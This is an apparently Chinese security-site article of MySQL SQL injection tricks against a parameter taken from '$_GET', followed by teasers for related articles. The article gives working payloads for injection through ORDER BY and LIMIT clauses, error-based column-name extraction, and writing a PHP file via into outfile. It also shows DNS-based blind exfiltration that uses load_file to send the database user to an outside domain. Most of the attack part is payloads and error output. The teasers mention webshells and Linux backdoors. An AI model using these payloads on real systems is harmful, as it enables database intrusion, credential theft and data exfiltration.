order by的参数注入技巧 limit的参数注入技巧
一、order by 的参数注入技巧:
两种方法,思路都一样。
example. “select username,password from uc_members order by”.$_GET['oderby']
a.常见的利用方法:
1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));
返回错误:[Err] 1242 - Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));
返回正常。
b.国外paper看到的方法:
1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;
返回错误:[Err] 1242 - Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;
返回正常。
二、limit 的参数注入技巧:
a.order by之后的limit参数 的注入,因为正常的sql语句order by后无法接union,所以没有好办法,就一个鸡肋思路:into outfile '/www/root/xxx.php';
b.limit前无order by时的注入,那就方便多了,后面可以直接接union select ,随便怎么注都行了:
select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7
这里还有个技巧,使用procedure analyse可以获取字段名称:
select * from cdb_members where uid=1 limit 1,1 procedure analyse()
不过procedure analyse同样不能使用在order by之后:
[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()
[Err] 1386 - Can't use ORDER clause with this procedure
三、无法猜测字段时的技巧:
在mysql5以下版本或者information_schema 无法访问的时候,无法猜到某个表的字段名,于是可以采用这个办法,在子查询中使用%0,报错获得列名。以ucenter的uc_members为例。
1.猜测列数:SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)
返回错误:#1241 - Operand should contain 12 column(s)
2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)
返回正常。
3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)
返回错误:#1048 - Column 'uid' cannot be null
4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)
返回错误:#1048 - Column 'username' cannot be null
5. ……
注:5.1以上版本不适用,字段必须为非空(not null)
四、windows下利用dns解析盲注的技巧:
如果盲注很累,或者页面无论and 1=1还是and 1=2的时候返回都一模一样,这个时候利用dns进行注入是个不错的方法,前提是win环境root权限下的mysql,利用load_file函数读取远程文件的思路。本地搭建一个dns服务器,然后将特定域名的NS server转过来。然后进行注入,并抓包。
本地测试了下(实际注入中单引号可以编码):select load_file(concat('\\\\aaa1.',(select user()),'.oldjun.com\\a.txt')),抓包成功获得select的结果:
29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com
如图所示:
为你介绍防arp攻击的方法 防arp攻击图解
为了解决这一问题,请广大用户使用下列方法,避免再次受到攻击。具体方法如下:1. 打开电脑的启动项目录。具体操作是点击“开始”→“程序” →“启动”右键单击选择“打开所有用户”。如图:2.将出
详情2018-01-23 20:19:55责编:llp 来源:驱动管家phpmyadmin 配置 phpmyadmin怎么得到webshell?
phpmyadmin 配置安装:1 网上下载PHPMyAdmin,我们将其释放到htdocs目录中,例如htdocs phpmyadmin。2 打开phpmyadmin目录,在此目录下是否有config sample inc php文件,如果存在,那么将其改名为config inc ph
详情2018-01-18 16:05:43责编:llp 来源:驱动管家extmail软件有哪些安全漏洞?extmail软件安全漏洞集锦
漏洞说明:ExtMail Project 是一个活跃的开源邮件系统项目,目前由ExtMail 团队维护。该项于2005年9月18日正式启动,最初以WebMail软件为主,至今已逐步形成了ExtMail软件系列。整个项目的目标是开发出高效、
详情2018-01-11 15:56:02责编:llp 来源:驱动管家如何在linux系统下留本地后门?留本地后门有哪些方法?
方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib] ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux so 2 -> ld-2 7 solrwxrwxrwx 1 root root
详情2018-02-10 15:02:51责编:llp 来源:驱动管家数据库web分离有什么好处?如何判断数据库web是否分离?
数据库web分离有什么好处?数据库服务器可以只对WEB服务器提供服务,不至于暴露在互联网中;将网络嗅探,暴力破解的可能性降到最低;数据库服务器可以只提供数据检索服务而不必处理其它服务;数据库服务器不需要
详情2018-02-25 12:58:52责编:llp 来源:驱动管家zend怎么进行目录提权?zend目录提权的原理
服务器上很多都装了Zend,就算C:Program Files 设置过权限,安装Zend后,Zend 会自动配置目录的权限C:Program FilesZendZendOptimizer-3 3 0 下的目录权限为Everyone 全权,这导致入侵者能写入文件。如果黑
详情2018-02-05 17:30:15责编:llp 来源:驱动管家怎么防范采用淘宝旺旺图标的淘宝后门程序?
淘宝,一个充满互联网的名字,可以让你足不出户就可以在家买到想买的东西,特别受到年轻人和在校学生青睐。可是淘宝的使用必定牵涉到网银的使用,很多用户都会提出,使用网银,我们安全吗?如何去辨别有害程序,
详情2018-02-03 19:29:44责编:llp 来源:驱动管家tns listener攻击的原因 tns listener没有设置口令受到哪些攻击?
首先,根据版本的不同,TNS listener可能较易受到多种类型的缓冲区溢出攻击,这些攻击可以在不提供用户ID和口令的情况下被利用。例如:在oracle 9i中,当客户机请求某个过长的service_name时,很容易受到溢出攻
详情2018-02-27 15:06:03责编:llp 来源:驱动管家google搜索网址出现g.cn渐隐广告怎么办?
有时候,当你打开某个Google搜索网址的时候(例如:卡卡网速测试),会出现一个G cn的渐隐广告如下:咋一看,还以为中了病毒。每刷新一次搜索网址,就会出现一次这个广告。分析一下为什么会出现这个广告,当然是
详情2018-02-03 13:02:57责编:llp 来源:驱动管家你知道流氓软件的代码是怎么样的吗?流氓软件的代码介绍
ps:请勿用于非法用途,仅供技术研究之用。by:yunshu这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代
详情2018-01-16 15:59:54责编:llp 来源:驱动管家
- cad打印预览的时候显示不全有什么办法解决
- 米牛小米预约软件怎么使用?米牛小米预约软件使用教程
- Z170/H170/B150/H110有什么区别 100系主板四大主流芯片组
- 现在挖矿用什么显卡 教你挑选最佳挖比特币显卡
- 脉脉CEO林凡称玩微信耗时 平时不用微信
- 美国智能机用户访问零售网站花费时间减少 支出却增加了
- 什么是流量劫持?Win10如何避免流量劫持?
- 如何将fat32分区转为ntfs分区?U盘FAT32格式轻松转换成NTFS格式
- 360手机n5好用吗?看看这篇手机评测就知道了
- 360 n6 pro装卡说明书教你如何安装sim 卡?
- 如何将qsv格式转换rmvb qsv格式转rmvb的步骤
- 搜狗输入法能不能打日语 搜狗输入法怎么打日文
- webshell执行cmd查用户的方法
- 隐藏在win xp的28个功能 哪个是你还没发现的?
- win8电脑上的文件缩略图显示错乱有什么办法恢复
- 在wps上怎么隐藏不想显示出的文字呢
- 玩绝地求生需要什么显卡?吃鸡显卡最低要求
- 注意!这些才是造成内存和主板不兼容的主要原因
- 配备蔡司镜头的诺基亚手机将获得专业相机模式
- iOS系统更新频率增加了51%